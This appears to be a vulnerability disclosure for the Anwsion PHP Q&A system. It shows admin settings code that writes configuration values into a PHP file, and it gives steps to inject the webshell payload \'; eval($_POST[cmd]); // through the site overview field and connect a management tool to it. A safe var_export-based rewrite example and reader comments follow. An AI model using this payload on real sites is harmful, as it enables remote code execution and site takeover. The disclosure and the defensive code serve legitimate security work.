The vulnerability affects all versions.
Combined with all versions earlier than Anwsion 0.7, the site can be compromised.
The code containing the design defect is shown below. Lines 75-96 save the website's back-end configuration to the database and also write it to a local PHP file, so a one-sentence backdoor written into a setting is executed.
/App/admin/controller/c_setting_class.inc.php
    // Save parameters to the database
    $retval = $this->model('setting')->set_vars($vars);

    // Save the cached file (the settings are also written to a local PHP file)
    if (!$this->model('setting')->update_setting_config())
    {
        H::ajax_json_output(AWS_APP::RSM(null, "-1", 'The configuration file cannot be written. Set the permissions of system/config/setting.php to 0777.'));
    }

    if ($retval)
    {
        ZCACHE::delete("setting_config");
        H::ajax_json_output(AWS_APP::RSM(null, "1", "System settings modified successfully"));
    }
    else
    {
        H::ajax_json_output(AWS_APP::RSM(null, "-1", "Failed to modify system settings"));
    }
}
The content of the written configuration file is as follows: system/config/setting.php
Open the back-end system settings page:
http://sa.sebug.net/admin/setting/setting/group_id-1
In the website overview field, add the one-sentence code \'; eval($_POST[cmd]); //
Connect a one-sentence management tool to /system/config/setting.php
In Anwsion 0.6 and earlier, the configuration file is written to /gzphp/config/setting.php
If you cannot access the one-sentence file because of rewrite restrictions, you can connect directly to the /index.php file with a one-sentence management tool.
The one-sentence file is connected successfully.
Solution:
Wait for the official patch or follow the latest updates.
After the vulnerability is published, the developers will be notified to claim it, to avoid malicious exploitation.
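One way to write settings to a PHP file so that values stay data, given as an added example (it is not Anwsion's code or an official patch). The function names, the `return array` file layout and the sample settings are assumptions.

```php
<?php
// Added example, not Anwsion code; names and file layout are hypothetical.

// var_export() escapes both backslashes and single quotes, so a value cannot
// close its own string literal and append statements to the generated file.
function render_setting_config(array $settings): string
{
    foreach ($settings as $key => $value) {
        if (!is_string($key) || !preg_match('/^[a-z0-9_]+$/D', $key)) {
            throw new InvalidArgumentException('unexpected setting name');
        }
        if (!is_scalar($value) && $value !== null) {
            throw new InvalidArgumentException("non-scalar value for $key");
        }
    }
    return "<?php\nreturn " . var_export($settings, true) . ";\n";
}

// Write to a temporary file, then rename, with owner-only write access
// instead of the 0777 mode the page's error message asks for.
function write_setting_config(string $path, array $settings): void
{
    $tmp = $path . '.' . bin2hex(random_bytes(6)) . '.tmp';
    if (file_put_contents($tmp, render_setting_config($settings), LOCK_EX) === false) {
        throw new RuntimeException('cannot write temporary config file');
    }
    chmod($tmp, 0640);
    if (!rename($tmp, $path)) {
        unlink($tmp);
        throw new RuntimeException('cannot replace config file');
    }
}

// Constructed sample: a value with the characters that matter (backslash,
// quote, semicolon, comment marker) and a harmless marker statement.
$settings = [
    'site_name'   => 'Example Q&A',
    'description' => "\\'; \$GLOBALS['injected'] = true; //",
];

$path = sys_get_temp_dir() . '/setting_demo_' . bin2hex(random_bytes(4)) . '.php';
write_setting_config($path, $settings);
$loaded = include $path;
unlink($path);

// The value must come back unchanged and the marker must not have executed.
if ($loaded !== $settings || isset($GLOBALS['injected'])) {
    throw new RuntimeException('settings did not round-trip as inert data');
}
echo "settings loaded as data only\n";
```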
I wonder why one more \ is added to the one-sentence code in the vulnerability preview. Is this added to prevent XSS attacks?
I do not know if one more \ will be added when the page is viewed in a browser after the review is passed. Otherwise, the test will be misled by others.